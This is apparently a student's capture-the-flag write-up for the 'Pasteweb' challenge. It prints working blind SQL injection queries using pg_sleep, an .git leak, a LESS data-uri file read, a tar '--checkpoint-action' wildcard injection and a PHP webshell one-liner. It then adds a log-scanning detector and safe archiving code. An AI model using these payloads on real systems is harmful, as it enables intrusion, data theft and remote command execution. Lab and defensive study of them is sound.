# NTU Computer Security HW4

###### tags: `NTU`

## Pasteweb

### p1

* **core: blind time-based SQLi**
* database type discovery: use `pg_sleep`
* can execute stacked queries
* schema dumping & leaking character by character
  * table: `SELECT case when substr(array_agg(concat(table_name))::text, {idx}, 1)='{c}' then pg_sleep(2) else pg_sleep(0) end FROM information_schema.tables`
  * column: `SELECT case when substr(array_agg(concat(column_name))::text, {idx}, 1)='{c}' then pg_sleep(2) else pg_sleep(0) end FROM information_schema.columns WHERE table_name='{table_name}'`
  * data leaking: `SELECT case when substr(array_agg(concat(fl4g))::text, {idx}, 1)='{c}' then pg_sleep(2) else pg_sleep(0) end FROM {table_name}`

### p2

#### create user

* from the previously leaked data, we can obtain the user's account & password
* from the password size, we can tell that it uses an MD5 hash
* create user statement: `insert into pasteweb_accounts (user_account, user_password) VALUES('{username}','{md5(username.encode()).digest().hex()}')`

#### git discovery

* from https://pasteweb.ctf.zoolab.org/.git/ we can tell that there is a git repo, from which the source code can be obtained later
* use `data-uri` in less to leak arbitrary files from the server (except `*.php` and `../` path traversal)

```less
p { color: data-uri('{path}'); }
```

* create a proxy server and leak the git repo with [scrabble](https://github.com/denny0223/scrabble)
* done, the flag is in `index.php`

### p3

* **core: tar wildcard exploit**
* create a file with a `--checkpoint` prefix; here we create `--checkpoint-action=exec=sh input.less .css`, where `input.less` will later be the malicious shell script
* to trigger a checkpoint, we have to create a file that is large enough: on Linux, tar takes a checkpoint every 10 records and each record requires 20*512 bytes
* hence, we can create our own webshell with `echo '<?php system($_GET["cmd"]) ?>' > meow.php` plus a very long comment
* access `/sandbox/md5(username)/meow.php`, then we can execute arbitrary commands via the query string
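Every step of the chain above (time-based probes with `pg_sleep`, `information_schema` enumeration, stacked queries, `/.git/` fetches, `data-uri` reads, option-looking file names and `cmd=` webshell calls) leaves a recognisable trace in the web server's access log. The scanner below is an added example written for this write-up, not code from the challenge or its authors; it assumes the common "combined" log format, and the log lines it scans are constructed for the demo.

```python
"""Added example (not part of the original write-up): flag access-log requests
that carry the indicators of the Pasteweb attack chain.

Assumes "combined" access-log lines; SAMPLE_LOG is constructed for the demo.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# (rule name, regex applied to the URL-decoded request path)
RULES = [
    ("time_based_sqli", re.compile(r"pg_sleep\s*\(", re.I)),
    ("schema_enum", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("stacked_query", re.compile(r";\s*(select|insert|update|delete|drop)\b", re.I)),
    ("git_exposure", re.compile(r"/\.git(/|$)")),
    ("less_data_uri", re.compile(r"data-uri\s*\(", re.I)),
    ("tar_option_injection", re.compile(r"--checkpoint(-action)?=", re.I)),
    ("webshell_cmd_param", re.compile(r"\.php\?[^ ]*\bcmd=", re.I)),
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one combined-log line; return a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["path"] = unquote_plus(entry["path"])  # decode before matching rules
    return entry


def classify_request(path):
    """Names of all rules matching the decoded request path, in RULES order."""
    return [name for name, rx in RULES if rx.search(path)]


def scan_log(lines):
    """Return (ip, decoded path, [rule names]) for every flagged request."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify_request(entry["path"])
        if tags:
            findings.append((entry["ip"], entry["path"], tags))
    return findings


def count_by_ip(findings):
    """Flagged requests per client; blind SQLi shows up as many hits from one IP."""
    return Counter(ip for ip, _, _ in findings)


# Constructed sample log (not real traffic). The second line is the write-up's
# table-name probe, URL-encoded as a browser would send it.
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2021:12:00:01 +0000] "GET /paste.php?id=3 HTTP/1.1" 200 512
10.0.0.9 - - [10/May/2021:12:00:02 +0000] "GET /paste.php?id=3%27;SELECT%20case%20when%20substr(array_agg(concat(table_name))::text,1,1)=%27a%27%20then%20pg_sleep(2)%20else%20pg_sleep(0)%20end%20FROM%20information_schema.tables-- HTTP/1.1" 200 512
10.0.0.9 - - [10/May/2021:12:00:05 +0000] "GET /.git/HEAD HTTP/1.1" 200 23
10.0.0.9 - - [10/May/2021:12:00:09 +0000] "POST /compile.php HTTP/1.1" 200 88
10.0.0.9 - - [10/May/2021:12:00:15 +0000] "GET /sandbox/deadbeef/meow.php?cmd=id HTTP/1.1" 200 60
10.0.0.7 - - [10/May/2021:12:00:20 +0000] "GET /style.css HTTP/1.1" 304 0
"""

if __name__ == "__main__":
    findings = scan_log(SAMPLE_LOG.splitlines())
    for ip, path, tags in findings:
        print(ip, tags, path[:60])
    print(count_by_ip(findings))
```

The rules match on the decoded path so that percent-encoding does not hide a probe; the per-IP counter matters because a character-by-character time-based extraction needs one request per candidate character, so the same client shows up hundreds of times with nearly identical paths.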
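The p3 bug only exists because a shell glob hands user-controlled file names to `tar` as argv, where a name starting with `--` is parsed as an option. The following added example (written for this write-up, not the challenge's own code) shows the two defensive pieces a sandbox backup job wants: a check that lists option-looking names for review, and an archiving routine built on Python's `tarfile`, which treats names as data and never as options. The directory and file names are constructed for the demo.

```python
"""Added example (not part of the original write-up): archive a user-writable
sandbox directory without the tar wildcard problem.

`tar cf out.tar *` lets the shell expand `*`, so a file named like
`--checkpoint-action=exec=...` becomes a tar option. tarfile adds each path
explicitly, so such a name is stored as an ordinary member. The sandbox
layout below is constructed for the demo.
"""
import os
import tarfile
import tempfile


def suspicious_names(directory):
    """Entries whose names a CLI tar fed by a shell glob would parse as options."""
    return sorted(n for n in os.listdir(directory) if n.startswith("-"))


def archive_directory(directory, out_path):
    """Archive every entry of `directory` with tarfile and return the member names.

    Names go to tarfile as data, never as argv, so an option-looking name is
    just a member and nothing is executed at checkpoints."""
    with tarfile.open(out_path, "w") as tf:
        for name in sorted(os.listdir(directory)):
            tf.add(os.path.join(directory, name), arcname=name)
    with tarfile.open(out_path, "r") as tf:
        return tf.getnames()


def demo():
    """Build a constructed sandbox with one benign option-looking name and archive it."""
    tmp = tempfile.mkdtemp()
    sandbox = os.path.join(tmp, "sandbox")
    os.mkdir(sandbox)
    for name, body in [("paste1.less", "p { color: red; }"),
                       ("--checkpoint=1", "")]:  # constructed; no exec action
        with open(os.path.join(sandbox, name), "w") as f:
            f.write(body)
    flagged = suspicious_names(sandbox)
    members = archive_directory(sandbox, os.path.join(tmp, "backup.tar"))
    return flagged, members


if __name__ == "__main__":
    flagged, members = demo()
    print("names to review:", flagged)
    print("archived members:", members)
```

If the job must stay a shell one-liner, the same effect comes from not letting file names reach tar's option parser: `tar -cf backup.tar -- *` ends option parsing before the glob, and `tar -cf backup.tar -C /path/to/sandbox .` archives `./`-prefixed names that can never look like options.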